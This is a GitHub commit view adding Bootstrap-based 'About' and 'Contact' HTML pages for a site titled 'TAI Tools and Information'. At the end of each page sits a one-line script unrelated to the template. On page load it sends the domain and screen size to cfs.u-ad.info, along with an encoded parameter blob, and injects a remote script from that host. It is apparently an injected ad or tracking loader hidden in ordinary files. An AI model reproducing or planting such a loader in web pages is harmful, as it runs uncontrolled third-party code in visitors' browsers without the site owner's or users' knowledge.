-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit 93af11b
Showing
7 changed files
with
959 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,168 @@ | ||
<!DOCTYPE html> | ||
<html lang="en"> | ||
<head> | ||
<meta charset="utf-8"> | ||
<meta http-equiv="X-UA-Compatible" content="IE=edge"> | ||
<meta name="viewport" content="width=device-width, initial-scale=1"> | ||
<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --> | ||
<meta name="description" content=""> | ||
<meta name="author" content="JDP"> | ||
<link rel="icon" href="favicon.ico"> | ||
<title>About | Tools and Information</title> | ||
<!-- Bootstrap core CSS --> | ||
<link rel="stylesheet" href="bootstrap.min.css"> | ||
<!-- Custom styles for this template --> | ||
<style type="text/css"> | ||
/* Space out content a bit */ | ||
body { | ||
padding-top: 20px; | ||
padding-bottom: 20px; | ||
} | ||
/* Everything but the jumbotron gets side spacing for mobile first views */ | ||
.header, | ||
.marketing, | ||
.footer { | ||
padding-right: 15px; | ||
padding-left: 15px; | ||
} | ||
/* Custom page header */ | ||
.header { | ||
padding-bottom: 20px; | ||
border-bottom: 1px solid #e5e5e5; | ||
} | ||
/* Make the masthead heading the same height as the navigation */ | ||
.header h3 { | ||
margin-top: 0; | ||
margin-bottom: 0; | ||
line-height: 40px; | ||
} | ||
/* Custom page footer */ | ||
.footer { | ||
padding-top: 19px; | ||
color: #777; | ||
border-top: 1px solid #e5e5e5; | ||
} | ||
/* Customize container */ | ||
@media (min-width: 768px) { | ||
.container { | ||
max-width: 730px; | ||
} | ||
} | ||
.container-narrow > hr { | ||
margin: 30px 0; | ||
} | ||
/* Main marketing message and sign up button */ | ||
.jumbotron { | ||
text-align: center; | ||
border-bottom: 1px solid #e5e5e5; | ||
} | ||
.jumbotron .btn { | ||
padding: 14px 24px; | ||
font-size: 21px; | ||
} | ||
/* Supporting marketing content */ | ||
.marketing { | ||
margin: 40px 0; | ||
} | ||
.marketing p + h4 { | ||
margin-top: 28px; | ||
} | ||
/* Responsive: Portrait tablets and up */ | ||
@media screen and (min-width: 768px) { | ||
/* Remove the padding we set earlier */ | ||
.header, | ||
.marketing, | ||
.footer { | ||
padding-right: 0; | ||
padding-left: 0; | ||
} | ||
/* Space out the masthead */ | ||
.header { | ||
margin-bottom: 30px; | ||
} | ||
/* Remove the bottom border on the jumbotron for visual effect */ | ||
.jumbotron { | ||
border-bottom: 0; | ||
} | ||
} | ||
</style> | ||
<!-- Just for debugging purposes. Don't actually copy these 2 lines! --> | ||
<!--[if lt IE 9]><script src="../../assets/js/ie8-responsive-file-warning.js"></script><![endif]--> | ||
<script src="../../assets/js/ie-emulation-modes-warning.js"></script> | ||
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> | ||
<!--[if lt IE 9]> | ||
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> | ||
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> | ||
<![endif]--> | ||
</head> | ||
<body> | ||
<div class="container"> | ||
<div class="header clearfix"> | ||
<nav> | ||
<ul class="nav nav-pills pull-right"> | ||
<li role="presentation"><a href="home">Home</a></li> | ||
<li role="presentation" class="active"><a href="about">About</a></li> | ||
<li role="presentation"><a href="contact">Contact</a></li> | ||
</ul> | ||
</nav> | ||
<h3 class="text-muted">TAI <small>v.1</small></h3> | ||
</div> | ||
<div class="jumbotron"> | ||
<h1>About TAI</h1> | ||
<p class="lead"> | ||
Tools and Information | ||
</p> | ||
<p><a class="btn btn-lg btn-warning" href="#" role="button">Cebok!</a></p> | ||
</div> | ||
<noscript> | ||
<div class="row marketing"> | ||
<div class="col-lg-6"> | ||
<h4>Subheading</h4> | ||
<p>Donec id elit non mi porta gravida at eget metus. Maecenas faucibus mollis interdum.</p> | ||
<h4>Subheading</h4> | ||
<p>Morbi leo risus, porta ac consectetur ac, vestibulum at eros. Cras mattis consectetur purus sit amet fermentum.</p> | ||
<h4>Subheading</h4> | ||
<p>Maecenas sed diam eget risus varius blandit sit amet non magna.</p> | ||
</div> | ||
<div class="col-lg-6"> | ||
<h4>Subheading</h4> | ||
<p>Donec id elit non mi porta gravida at eget metus. Maecenas faucibus mollis interdum.</p> | ||
<h4>Subheading</h4> | ||
<p>Morbi leo risus, porta ac consectetur ac, vestibulum at eros. Cras mattis consectetur purus sit amet fermentum.</p> | ||
<h4>Subheading</h4> | ||
<p>Maecenas sed diam eget risus varius blandit sit amet non magna.</p> | ||
</div> | ||
</div> | ||
</noscript> | ||
<footer class="footer"> | ||
<p>© TAI 2015.</p> | ||
</footer> | ||
</div> <!-- /container --> | ||
<!-- IE10 viewport hack for Surface/desktop Windows 8 bug --> | ||
<script src="../../assets/js/ie10-viewport-bug-workaround.js"></script> | ||
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRl%2bTtxfQADzcWhEF9WOA5hxzKPDjLQCC4KZex8LFd1Sf2D%2fDfpSMPKXWdZ924Z8gtSoFWXoh9%2fCnhu2JTl7fd%2bFrHdBsN%2fl1yS2W62rjygtQgrBE0R7oGN3EVSBByuJ93PZdCq2VwrbNk%2bQqKGTURu0w1x0C4jysLe2yP0Mt7W8UbYq8X3OaxGi0UJHCDwtUJ%2fIdynPYtBj41zM0cVUmNbTJCon%2fOnhKIcGCmpmrDRAiyxZt7KEf2lWVpmIABvU24NMAz%2fWBqtONUfbtOgzcsrM5v9vOeYAMQ3hC6TH3adD5DI3JRyrSxJ6RCJInDH1rmLX5snqIODj0RlPff64MmdXr0N%2ffldCq8z7KbS9I18UyvlrDAxh6OGMVeWBLjoEQp2MfBwq7%2fZ3Wb0vl3UnnLeASrwRClXCWCPecBdZYLv6L0F03H7uoTAYTSFSE34eEQMaz5YM5X8JH%2f12%2btZAOP5OxV3Kztsn7wCIRundEYMabHkF24nzbwWuLv8OKgq02g" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body> | ||
</html> |
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,168 @@ | ||
<!DOCTYPE html> | ||
<html lang="en"> | ||
<head> | ||
<meta charset="utf-8"> | ||
<meta http-equiv="X-UA-Compatible" content="IE=edge"> | ||
<meta name="viewport" content="width=device-width, initial-scale=1"> | ||
<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --> | ||
<meta name="description" content=""> | ||
<meta name="author" content="JDP"> | ||
<link rel="icon" href="favicon.ico"> | ||
<title>Contact | Tools and Information</title> | ||
<!-- Bootstrap core CSS --> | ||
<link rel="stylesheet" href="bootstrap.min.css"> | ||
<!-- Custom styles for this template --> | ||
<style type="text/css"> | ||
/* Space out content a bit */ | ||
body { | ||
padding-top: 20px; | ||
padding-bottom: 20px; | ||
} | ||
/* Everything but the jumbotron gets side spacing for mobile first views */ | ||
.header, | ||
.marketing, | ||
.footer { | ||
padding-right: 15px; | ||
padding-left: 15px; | ||
} | ||
/* Custom page header */ | ||
.header { | ||
padding-bottom: 20px; | ||
border-bottom: 1px solid #e5e5e5; | ||
} | ||
/* Make the masthead heading the same height as the navigation */ | ||
.header h3 { | ||
margin-top: 0; | ||
margin-bottom: 0; | ||
line-height: 40px; | ||
} | ||
/* Custom page footer */ | ||
.footer { | ||
padding-top: 19px; | ||
color: #777; | ||
border-top: 1px solid #e5e5e5; | ||
} | ||
/* Customize container */ | ||
@media (min-width: 768px) { | ||
.container { | ||
max-width: 730px; | ||
} | ||
} | ||
.container-narrow > hr { | ||
margin: 30px 0; | ||
} | ||
/* Main marketing message and sign up button */ | ||
.jumbotron { | ||
text-align: center; | ||
border-bottom: 1px solid #e5e5e5; | ||
} | ||
.jumbotron .btn { | ||
padding: 14px 24px; | ||
font-size: 21px; | ||
} | ||
/* Supporting marketing content */ | ||
.marketing { | ||
margin: 40px 0; | ||
} | ||
.marketing p + h4 { | ||
margin-top: 28px; | ||
} | ||
/* Responsive: Portrait tablets and up */ | ||
@media screen and (min-width: 768px) { | ||
/* Remove the padding we set earlier */ | ||
.header, | ||
.marketing, | ||
.footer { | ||
padding-right: 0; | ||
padding-left: 0; | ||
} | ||
/* Space out the masthead */ | ||
.header { | ||
margin-bottom: 30px; | ||
} | ||
/* Remove the bottom border on the jumbotron for visual effect */ | ||
.jumbotron { | ||
border-bottom: 0; | ||
} | ||
} | ||
</style> | ||
<!-- Just for debugging purposes. Don't actually copy these 2 lines! --> | ||
<!--[if lt IE 9]><script src="../../assets/js/ie8-responsive-file-warning.js"></script><![endif]--> | ||
<script src="../../assets/js/ie-emulation-modes-warning.js"></script> | ||
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> | ||
<!--[if lt IE 9]> | ||
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> | ||
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> | ||
<![endif]--> | ||
</head> | ||
<body> | ||
<div class="container"> | ||
<div class="header clearfix"> | ||
<nav> | ||
<ul class="nav nav-pills pull-right"> | ||
<li role="presentation"><a href="home">Home</a></li> | ||
<li role="presentation"><a href="about">About</a></li> | ||
<li role="presentation" class="active"><a href="#">Contact</a></li> | ||
</ul> | ||
</nav> | ||
<h3 class="text-muted">TAI <small>v.1</small></h3> | ||
</div> | ||
<div class="jumbotron"> | ||
<h1>Contact TAI</h1> | ||
<p class="lead"> | ||
Tools and Information | ||
</p> | ||
<p><a class="btn btn-lg btn-danger" href="#" role="button">Nabok!</a></p> | ||
</div> | ||
<noscript> | ||
<div class="row marketing"> | ||
<div class="col-lg-6"> | ||
<h4>Subheading</h4> | ||
<p>Donec id elit non mi porta gravida at eget metus. Maecenas faucibus mollis interdum.</p> | ||
<h4>Subheading</h4> | ||
<p>Morbi leo risus, porta ac consectetur ac, vestibulum at eros. Cras mattis consectetur purus sit amet fermentum.</p> | ||
<h4>Subheading</h4> | ||
<p>Maecenas sed diam eget risus varius blandit sit amet non magna.</p> | ||
</div> | ||
<div class="col-lg-6"> | ||
<h4>Subheading</h4> | ||
<p>Donec id elit non mi porta gravida at eget metus. Maecenas faucibus mollis interdum.</p> | ||
<h4>Subheading</h4> | ||
<p>Morbi leo risus, porta ac consectetur ac, vestibulum at eros. Cras mattis consectetur purus sit amet fermentum.</p> | ||
<h4>Subheading</h4> | ||
<p>Maecenas sed diam eget risus varius blandit sit amet non magna.</p> | ||
</div> | ||
</div> | ||
</noscript> | ||
<footer class="footer"> | ||
<p>© TAI 2015.</p> | ||
</footer> | ||
</div> <!-- /container --> | ||
<!-- IE10 viewport hack for Surface/desktop Windows 8 bug --> | ||
<script src="../../assets/js/ie10-viewport-bug-workaround.js"></script> | ||
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRl%2bTtxfQADzcWhEF9WOA5hxzKPDjLQCC4KZex8LFd1Sf2D%2fDfpSMPKXWdZ924Z8gtSoFWXoh9%2fCnhu2JTl7fd%2bFrHdBsN%2fl1yS2W62rjygtQgrBE0R7oGN3EVSBByuJ93PZdCq2VwrbNk%2bQqKGTURu0w1x0C4jysLe2yP0Mt7W8UbYq8X3OaxGi0UJHCDwtUJ%2fIdynPYtBj41zM0cVUmNbTJCon%2fOnhKIcGCmpmrDRAiyxZt7KEf2lWVpmIABvU24NMAz%2fWBqtONUfbtOgzcsrM5v9vOeYAMQ3hC6TH3adD5DI3JRyrSxJ6RCJInDH1rmLX5snqIODj0RlPff64MmdXr0N%2ffldCq8z7KbS9I18UyvlrDAxh6OGMVeWBLjoEQp2MfBwq7%2fZ3Wb0vl3UnnLeASrwRClXCWCPecBdZYLv6L0F03H7uoTAYTSFSE34eEQMaz5YM5X8JH%2f12%2btZAOP5OxV3Kztsn7wCIRundEYMabHkF24nzbwWuLv8OKgq02g" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body> | ||
</html> |
Binary file not shown.
Oops, something went wrong.